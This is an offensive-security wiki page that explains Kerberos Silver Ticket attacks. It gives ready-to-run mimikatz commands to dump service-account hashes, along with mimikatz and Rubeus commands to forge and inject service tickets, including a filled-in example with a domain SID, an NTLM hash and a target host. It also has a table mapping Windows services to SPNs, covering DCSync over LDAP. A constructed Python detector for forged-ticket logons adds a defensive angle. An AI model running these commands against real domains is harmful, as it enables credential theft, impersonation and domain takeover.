Silver Ticket

We know that authorizations/permissions (group memberships) are provided by the KDC inside the TGS (service ticket) and are then checked by the service behind the SPN in question, not by the KDC. This means that if we have the credentials/hash of the SPN's account (from kerberoasting, an NTLM hash, etc.), we can create a Silver Ticket carrying any privilege for that service.

There is an optional check, rarely implemented for service applications, called PAC (Privilege Attribute Certificate) validation, in which the service asks the domain controller to verify the PAC before trusting the permissions and group memberships it carries.

In general, we need to collect the following three pieces of information to create a silver ticket:

  • SPN password hash
  • Domain SID
  • Target SPN

Attack

If you have administrator privileges on the host, you can get the NTLM hashes of the service accounts with mimikatz's sekurlsa::logonpasswords. Otherwise the hash has to be obtained with other techniques.

Forge Silver Ticket

.\mimikatz.exe
kerberos::golden /sid:<SID_DOMAIN> /domain:<DOMAIN> /ptt /target:<TARGET> /service:<NAME_SPN> /rc4:<NTLM_SPN> /id:<FOR_RID> /user:<FOR_USER>

/ptt      Inject the forged ticket into memory so it can be used immediately
/sid      Domain SID (output of whoami /user without the trailing RID)
/domain   Domain as FQDN
/target   Machine hosting the attacked service, as FQDN
/service  Service class of the SPN (http in the example below)
/rc4      NTLM hash of the service account, used to encrypt the ticket. Alternatives: /ntlm, /aes128 or /aes256
/id       RID to forge the ticket for
/user     User name to forge the ticket for (can be fake)

kerberos::golden /sid:S-1-5-21-4172452648-1021989953-2368502130-1105 /domain:offense.local /ptt /id:1155 /target:web04.offense.local /service:http /rc4:a87f3a337d73085c45f9416be5787d86 /user:beningnadmin
iwr -UseDefaultCredentials http://web04
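An added example, not from the original page, that shows the defender's side of the /id and /user arguments above: because a forged ticket never passes through the KDC, the resulting logon on the host carries a user name/RID pair the directory cannot confirm and has no matching 4769 service-ticket request on the domain controller. The log records, the directory snapshot and the simplified field layout are all constructed; only the domain SID and the beningnadmin/1155 pair are taken from the example command.

```python
from collections import namedtuple

# Constructed, simplified records (not real EVTX fields): a 4624 network logon seen on the
# service host, and a 4769 service-ticket request seen on the domain controller.
Logon = namedtuple("Logon", "host user sid")
TgsRequest = namedtuple("TgsRequest", "user target_host")

DOMAIN_SID = "S-1-5-21-4172452648-1021989953-2368502130"  # domain SID from the page's example

# Constructed directory snapshot (RID -> samAccountName), as an analyst would export it from AD.
DIRECTORY = {500: "administrator", 1105: "svc_web", 1155: "jsmith"}

def rid_of(sid):
    """RID of a SID in our domain, or None for well-known/foreign SIDs (e.g. S-1-5-18)."""
    prefix = DOMAIN_SID + "-"
    return int(sid[len(prefix):]) if sid.startswith(prefix) else None

def find_silver_ticket_candidates(logons, tgs_requests):
    """Return (user, host, reasons) for logons that neither the directory nor the KDC can vouch for."""
    issued = {(t.user.lower(), t.target_host.lower()) for t in tgs_requests}
    findings = []
    for lg in logons:
        rid = rid_of(lg.sid)
        if rid is None:
            continue  # local or built-in identity, outside this check
        reasons = []
        known = DIRECTORY.get(rid)
        if known is None:
            reasons.append(f"RID {rid} does not exist in the directory")
        elif known.lower() != lg.user.lower():
            # A forged PAC lets /user and /id be chosen independently (the page's "can be fake").
            reasons.append(f"name {lg.user} does not match RID {rid} (directory says {known})")
        if (lg.user.lower(), lg.host.lower()) not in issued:
            # Silver tickets never touch the KDC, so the DC holds no 4769 for this logon.
            reasons.append("no matching 4769 service-ticket request on the DC")
        if reasons:
            findings.append((lg.user, lg.host, reasons))
    return findings

# Constructed sample: one legitimate session and one forged session on web04.
SAMPLE_TGS = [TgsRequest("jsmith", "web04.offense.local")]
SAMPLE_LOGONS = [
    Logon("web04.offense.local", "jsmith", DOMAIN_SID + "-1155"),
    Logon("web04.offense.local", "beningnadmin", DOMAIN_SID + "-1155"),  # forged: /user:beningnadmin /id:1155
    Logon("web04.offense.local", "SYSTEM", "S-1-5-18"),
]

if __name__ == "__main__":
    for user, host, reasons in find_silver_ticket_candidates(SAMPLE_LOGONS, SAMPLE_TGS):
        print(f"{user}@{host}: " + "; ".join(reasons))
```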

In Current Process

Rubeus.exe silver /service:<NAME_SPN>/<TARGET> /rc4:<NTLM_SPN> /user:<FOR_USER> /domain:<DOMAIN> /sid:<SID_DOMAIN> /nowrap /ptt

For arguments see mimikatz above.

In New Process

Create Ticket

Create Process

Inject Ticket

Impersonate Process with Invoke-SharpImpersonation.

SPN service

Service Type                                 | Service Silver Tickets
---------------------------------------------|-----------------------------------------------------------
WMI                                          | HOST, RPCSS
PowerShell Remoting                          | HOST, HTTP (depending on OS also WSMAN, RPCSS)
WinRM                                        | HOST, HTTP (in some occasions you can just ask for WINRM)
Scheduled Tasks                              | HOST
Windows File Share, also psexec              | CIFS
LDAP operations, including DCSync            | LDAP
Windows Remote Server Administration Tools   | RPCSS, LDAP, CIFS
Golden Tickets                               | krbtgt
